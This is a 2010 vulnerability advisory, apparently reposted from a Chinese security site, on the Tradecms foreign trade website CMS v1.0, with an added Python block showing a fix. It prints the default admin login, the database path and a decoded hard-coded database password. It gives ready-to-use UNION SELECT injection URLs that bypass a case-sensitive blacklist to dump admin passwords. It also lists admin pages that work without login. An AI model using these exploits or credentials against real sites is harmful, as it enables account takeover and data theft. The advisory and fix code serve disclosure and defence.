Tradecms English foreign trade enterprise website v1.0 vulnerability analysis - vulnerability warning - the black bar safety net

2010-07-16T00:00:00
ID MYHACK58:62201027615
Type myhack58
Reporter Anonymous (佚名)
Modified 2010-07-16T00:00:00

Description

Release time: 2010-07-15

Affected version: Tradecms English foreign trade enterprise website v1.0

Vulnerability description: SQL injection; broken access control (privilege bypass) on the admin pages.

Database path: Clkj_DaTa/#Clkj_Cms#.mdb
Database open password: see the analysis below
Default account and password: user: admin, password: 1
Default admin panel address: /Clkj_Admin/Index.html

Author: m4r10 <http://hi.baidu.com/m4r10>. Please credit the source when reproducing.

Vulnerability analysis: P_view.asp, N_view.asp

' Product display P_view.asp -------------------------------------------------------
set rs=server.createobject("adodb.recordset")
exec="select * from clkj_Products where clkj_prid="&request("pid")   ' SQL query: pid is concatenated into the statement unchecked
rs.open exec,conn,1,1
clkj_BigClassID=rs("clkj_BigClassID")
clkj_SmallClassID=rs("clkj_SmallClassID")
clkj_SmallClassName=rs("clkj_SmallClassName")
clkj_BigClassName=rs("clkj_BigClassName")
clkj_prtitle=rs("clkj_prtitle")
clkj_prcontent=rs("clkj_prcontent")
clkj_prkey=rs("clkj_prkey")
clkj_prprdes=rs("clkj_prprdes")
clkj_prpic=rs("clkj_prpic")
rs.close

' News display N_view.asp ----------------------------------------------------------
set rs=server.createobject("adodb.recordset")
exec="select * from clkj_News where clkj_newsid="&request("nid")   ' SQL query: nid is concatenated into the statement unchecked
rs.open exec,conn,1,1
clkj_news_Title=rs("clkj_news_Title")
clkj_news_content=rs("clkj_news_content")
clkj_news_db=rs("clkj_news_db")
clkj_news_key=rs("clkj_news_key")
clkj_news_time=rs("clkj_news_time")
rs.close

Include file: <!--#include file="Clkj_Inc/clkj_inc.asp"-->

Clkj_Inc/clkj_inc.asp in turn includes the SQL anti-injection file Clkj_Conn.asp.

Clkj_Conn.asp anti-injection code:

Dim clkj_js,clkj_dui,clkj_i
clkj_js=request.servervariables("query_string")   ' GET mode: only the query string is inspected
Dim deStr(17)   ' The following are the filtered strings
deStr(0)="net user"
deStr(1)="xp_cmdshell"
deStr(2)="/add"
deStr(3)="exec%20master.dbo.xp_cmdshell"
deStr(4)="net localgroup administrators"
deStr(5)="select"
deStr(6)="count"
deStr(7)="asc"
deStr(8)="char"
deStr(9)="mid"
deStr(10)="'"
deStr(11)=":"
deStr(12)=""""
deStr(13)="insert"
deStr(14)="delete"
deStr(15)="drop"
deStr(16)="truncate"
deStr(17)="from"
clkj_dui=false
For clkj_i=0 to ubound(deStr)
    ' InStr uses a binary (case-sensitive) compare by default
    IF instr(clkj_js,deStr(clkj_i))<>0 then clkj_dui=true
Next
IF clkj_dui Then
    Response.Write("error")
    response.end
end if

This anti-injection code only filters the lowercase spelling of select (InStr compares case-sensitively by default), so an uppercase SELECT bypasses it easily.
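As an added example (not code from the advisory or from Tradecms), here is a Python model of the Clkj_Conn.asp blacklist check, reproducing its case-sensitive match, next to the allow-list integer check and parameterized query that would actually close the hole; the function names and the "?" placeholder convention are assumptions made for illustration.

```python
"""Added example (not code from the advisory or from Tradecms): a Python model
of the Clkj_Conn.asp blacklist check next to the allow-list check that should
have guarded the pid / nid parameters."""
import re
from typing import Optional, Tuple

# The deStr() list transcribed from the advisory; note that it holds only
# lowercase spellings and has no entry for "union".
DESTR = ["net user", "xp_cmdshell", "/add", "exec%20master.dbo.xp_cmdshell",
         "net localgroup administrators", "select", "count", "asc", "char",
         "mid", "'", ":", '"', "insert", "delete", "drop", "truncate", "from"]


def clkj_blacklist_blocks(query_string: str) -> bool:
    """Reproduces the advisory's filter: VBScript InStr() uses a binary
    (case-sensitive) compare by default, so only lowercase spellings match."""
    return any(bad in query_string for bad in DESTR)


def case_insensitive_blacklist_blocks(query_string: str) -> bool:
    """The same list compared case-insensitively. It closes the uppercase gap
    but is still a blacklist: it also rejects harmless values that happen to
    contain "mid" or "asc", and it misses anything not on the list."""
    qs = query_string.lower()
    return any(bad in qs for bad in DESTR)


def safe_record_id(raw: Optional[str]) -> Optional[int]:
    """Allow-list: the only valid pid/nid is a short unsigned integer.
    Anything else is rejected before it reaches the query, whatever its case."""
    if raw is None or not re.fullmatch(r"[0-9]{1,9}", raw):
        return None
    return int(raw)


def build_product_query(raw_pid: Optional[str]) -> Tuple[str, Tuple[int, ...]]:
    """Builds the P_view.asp query as a parameterized statement (the "?"
    placeholder is the ADODB.Command / DB-API convention, assumed here) instead
    of string concatenation, so the id is always bound as a number."""
    pid = safe_record_id(raw_pid)
    if pid is None:
        raise ValueError("pid must be an unsigned integer")
    return "select * from clkj_Products where clkj_prid=?", (pid,)
```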

The database is password-protected. Recently I have looked at many programs that encrypt the database password; some even hide table and field names and encrypt the ASP files. Could this be a trend? In fact, I think it is redundant.

Let us look at the database password:

connstr="DBQ="+server.mappath(""&Clkj_mdb&"")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};password="&pwd&";"

pwd is defined in Clkj_Inc\Clkj_Md5.asp:

pwd=NumTOstring("l0k9j8h7b6l0k9j8h7b6")

together with a function NumTOstring:

Function NumTOstring(num)
    num=replace(num,"0","1")
    num=replace(num,"9","2")
    num=replace(num,"8","3")
    num=replace(num,"7","4")
    num=replace(num,"6","5")
    num=replace(num,"l","a")
    num=replace(num,"k","s")
    num=replace(num,"j","d")
    num=replace(num,"h","f")
    num=replace(num,"b","g")
    NumTOstring=num
End function

Finally we get: pwd = NumTOstring("l0k9j8h7b6l0k9j8h7b6") = "a1s2d3f4g5a1s2d3f4g5"

Then reopen the database with this password and look at the administrator table: table name clkj_admin, fields clkj_admin, clkj_password.

The exploit:

http://127.1/P_view.asp?pid=273%20AND%201=2%20UNION%20SELECT%201,2,3,4,5,clkj_password,clkj_admin,8,9,10,11,12,13,14,15,16,17%20FROM%20clkj_admin

http://127.1/N_view.asp?nid=65%20AND%201=2%20UNION%20SELECT%201,2,3,4,5,clkj_password,7,8,9%20FROM%20clkj_admin

This directly reveals the administrator password.

Privilege bypass (broken access control) vulnerability: the following files do not include the authentication file, so the following vulnerabilities arise:

Clkj_Admin/Nimda_menu.asp: add and delete columns without logging in
Clkj_Admin/Nimda_user.asp: add and delete administrators without logging in
Clkj_Admin/Nimda_product.asp: add products without logging in

Source: m4r10, http://hi.baidu.com/m4r10. Please credit the source when reprinting.